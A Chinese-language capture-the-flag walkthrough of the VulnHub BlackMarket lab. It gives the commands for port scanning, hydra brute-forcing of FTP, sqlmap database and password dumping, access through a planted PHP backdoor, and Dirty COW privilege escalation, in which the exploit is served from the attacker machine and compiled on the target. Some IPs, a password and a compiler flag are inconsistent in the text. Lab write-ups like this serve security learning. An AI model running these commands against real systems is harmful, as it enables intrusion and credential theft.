BlackMarket靶机

靶机地址：BlackMarket: 1 ~ VulnHub

打开靶机，将靶机与攻击机kali设为桥接模式，并查看靶机MAC地址：

一、信息收集

确定目标主机：

arp-scan -l

查看靶机开放的端口：

nmap -A -sS -sV -v -p- 192.168.7.97

浏览器访问80端口，发现是一个登录页面

查看页面源代码，找到flag1{Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=}，发现它是base64编码对其解密为：CIA – Operation Treadstone

浏览器搜索CIA – Operation Treadstone 相关内容：

使用cewl来爬取该CIA – Operation Treadstone网站来生成字典

cewl -d -m -w CIA-OT.txt https://bourne.fandom.com/wiki/Operation_Treadstone

使用九头蛇hydra爆破ftp账号密码得到nicky CIA；但爆破ssh失败

hydra -L CIA-OT.txt -P CIA-OT.txt  -V -f 192.168.7.97 ftp

使用ftp连接nicky用户，发现连接成功

得到了flag2{Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy}，并看到提示“CIA blackmarket Vehicle workshop”——中央情报局黑市车辆车间

ftp 192.168.1.104
ls -al
cd ftp
ls -al
cd IMPFiles
ls -al
more IMP.txt

使用dirb扫描目录

dirb http://192.168.7.97/

拼接/squirrelmail/

发现了squirrelmail的版本号为1.4.23，搜索相关漏洞发现了Squirrelmail远程代码执行漏洞（CVE-2017-7692），这个漏洞利用的前提是拥有一个登录的邮箱账号和密码，暂时无发现，先搁置

拼接/supplier/,这个目录会302重定向到Web登录界面

尝试使用目录名字supplier supplier登录，发现登录成功

编辑AK74U时抓包，再使用sqlmap检测是否存在SQL注入，发现存在SQL注入

 获取所有数据库名：

sqlmap -r sql.txt --dbs --batch

 获取BlackMarket数据库下的表：

sqlmap -r sql.txt -D BlackMarket --tables --batch

 获取flag表所有的字段：

sqlmap -r sql.txt -D BlackMarket -T flag --columns --batch

 获取所有字段数据：

sqlmap -r sql.txt -D BlackMarket -T flag -C name,FlagId,Information --dump --batch

发现flag3需要找 Jason Bourne 电子邮件访问；

获取user表中的字段

sqlmap -r sql.txt -D BlackMarket -T user --columns --batch

 获取所有数据：

sqlmap -r sql.txt -D BlackMarket -T user -C access,password,username,userid --dump --batch

对各用户密码进行解密：

admin   BigBossCIA
user    user
jbourne 解密失败
bladen  解密失败

登录admin用户，登录成功并发现了flag4{bm90aGluZyBpcyBoZXJl}以及Jason Bourne邮箱密码：?????

发现了Jason Bourne 的电子邮件：jbourne@cia.gov

一开始我们就找到了一个邮箱的登录界面，开始的想法是利用已知的漏洞去攻击，但是现在可以不用了，我们知道了邮箱密码为：????；用户名应该和Jason Bourne有关，而上述又发现了jbourne用户，尝试进行登录，登陆成功

点击INBOX.Trash——>IMPORTANT MESSAGE，发现flag5{RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ=}

还发现了一段不知道什么语言的文字，对如下内容进行解码，解码网站：quipqiup - cryptoquip and cryptogram solver

Sr Wrnrgir
Ru blf ziv ivzwrmt gsrh R nrtsg yv mlg zorev. R szev kozxv z yzxpwlli rm Yozxpnzipvg
dliphslk fmwvi /ptyyzxpwlli ulowvi blf nfhg szev gl
KzhhKzhh.qkt rm liwvi gl szxp rm rg.

Hi Dimitri If you are reading this I might be not alive. I have place a backdoor in Blackmarket workshop under /kgbbackdoor folder you must have to PassPass.jpg in order to hack in it.

这段话告诉我们/kgbbackdoor目录下留了一个后门，后门是一张叫PassPass.jpg的图片，但是没有路径，并且前面目录爆破也没有；

只能从数据库着手了，发现有一个eworkshop的数据库，利用crunch生成字典进行爆破：

crunch 9 9 -t @workshop > shop.txt

利用dirb爆破路径拿到路径：

dirb http://192.168.7.97 shop.txt

拼接/vworkshop/kgbbackdoor/PassPass.jpg

将照片下载到本地然后上传到kali上，并对其进行查看，发现密码为：5215565757312090656，解密为：HailKGD

cat PassPass.jpg

存在backdoor.php文件，那么后门路径就是http://192.168.1.104/vworkshop/kgbbackdoor/backdoor.php

，访问发现404，查看页面源代码，发现登录框

第一次输入密码无反应，多次输入（用POST传pass=HailKGB），成功进入后门

成功得到flag6{Um9vdCB0aW1l}

二、Getshell

设置监听

监听成功

三、权限提升（脏牛提权）

获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

查看系统内核——linux系统，内核版本4.4.0-31-generic，搜索发现这个版本可以利用CVE-2016-5195脏牛提权，知道了这是一个内核竞争提权漏洞

搜索脏牛提权

将exp复制到kali上面来，并开启一个http服务

cp /usr/share/exploitdb/exploits/linux/local/40616.c .
python3 -m http.server

然后靶机将exp从kali下载过去(记得下载到/tmp目录，这个目录有写入权限),最后编译执行

gcc 40616.c -0 cowroot -pthread

提权成功！